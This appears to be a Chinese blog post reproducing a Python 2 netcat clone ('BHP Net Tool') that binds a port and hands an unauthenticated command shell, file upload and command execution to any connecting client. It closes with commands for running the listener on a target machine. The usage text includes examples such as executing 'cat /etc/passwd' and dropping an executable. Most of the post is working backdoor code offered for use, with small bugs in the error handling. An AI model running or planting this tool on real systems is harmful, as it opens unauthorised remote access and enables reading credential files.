仿netcat,手写tcp通道,创建监听拥有命令行权限!
# -*- coding: utf-8 -*-__author__ = 'wangjingyao'import sysimport socketimport getoptimport threadingimport subprocess#定义一些全局变量listen = Falsecommand = Falseupload = Falseexecute = ""target = ""upload_destination = ""port = 0# 说明文档def usage(): print "BHP Net Tool" print print "Usage: bhpnet.py -t target_host -p port" print "-l --listen -listen on [host]:[port] for incoming connections" print "-e --execute =file_to_run -execute the given file upon receiving a connection" print "-c --command - initialize a command shell" print " -u --upload = destination -upon receiving connection upload a file an write to [destination]" print print print "Example :" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e =\"cat /etc/passwd\"" print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168..11.12 -p 135" sys.exit(0)def run_command(command): #换行 command=command.rstrip() print "---------------command",command #运行命令行并将输出返回 try: output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True) except: output+"Failed to execute command.\r\n" # 将数据发送 return output#实现文件上传,命令执行,shell相关功能def client_handler(client_socket): global upload global execute global command #测试上传文件 if len(upload_destination): #读取所有的字符并写下目标 file_buffer="" #持续读取数据直到没有符合的数据 while True: data = client_socket.recv(1024) if not data: break else: file_buffer+=data #现在我们接收这些数据并将它们写出来 try: file_descriptor = open(upload_destination,"wb") file_descriptor.write(file_buffer) file_descriptor.close() #确认文件已经写出来 client_socket.send("Successfully saved file to %s\r\n" % upload_destination) except: client_socket.send("Failed to save file to %s\r\n" % upload_destination) #检查命令执行 if len(execute): #运行命令 output = run_command(execute) client_socket.send(output) #如果需要一个命令行shell,那么我们进入另一个循环 if command: while True: #跳出一个窗口 client_socket.send("<BHP:#> ") #现在我们接受文件知道发现换行符 cmd_buffer="" while "\n" not in cmd_buffer: 
cmd_buffer+=client_socket.recv(1024) #返还命令输出 response=run_command(cmd_buffer) #返回相应数据 client_socket.send(response)# 服务器端主循环和子函数def server_loop(): global target #如果没有定义目标,那么我们监听所有的接口 if not len(target): target="0.0.0.0" server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) print target,port server.bind((target,port)) server.listen(5) while True: client_socket,addr=server.accept() #分拆一个线程处理新的客户端 client_thread=threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start()def client_sender(buffer): client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: # 链接到目标主机 client.connect((target,port)) if len(buffer): client.send(buffer) while True: # 现在等待数据回传 recv_len =1 response="" while recv_len: data = client.recv(4096) recv_len=len(data) response+=data if recv_len<4096: break print response, # 等待更多的输入 buffer=raw_input("") buffer+="\n" # 发送出去 client.send(buffer) except: print "[*] Exception Exiting." #关闭链接 client.close()# 创建主函数处理命令行参数和调用我们编写的其他函数def main(): global listen global port global execute global command global upload_destination global target if not len(sys.argv[1:]): usage() # 读取命令行选项 try: opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ("-h","--help"): usage() elif o in ("-l","--listen"): listen =True elif o in ("-e","--execute"): execute =a elif o in ("-c","--commandshell"): command=True elif o in ("-u","--upload"): upload_destination =a elif o in ("-t","--target"): target=a elif o in ("-p","--port"): port=int(a) else: assert False,"Unhadled Option" # 我们是进行监听还是仅从标准输入发送数据 if not listen and len(target) and port > 0: # 从命令行读取内存数据 # 这里将阻塞,所以不再向标准输入发送数据时发送 CTRL-D buffer = sys.stdin.read() # 发送数据 client_sender(buffer) #我们开始监听并准备上传文件,执行命令,放置一个反弹shell,取决于上面的命令行选项 if listen: server_loop()main()
目标靶机 (listener, exposes an unauthenticated cmd shell on port 9999 to anyone who can reach it): windows cmd : python bhpnet.py -l -t 192.168.180.XXX -p 9999 -c
客户端: windows cmd: python bhpnet.py -t 192.168.180.XXX -p 9999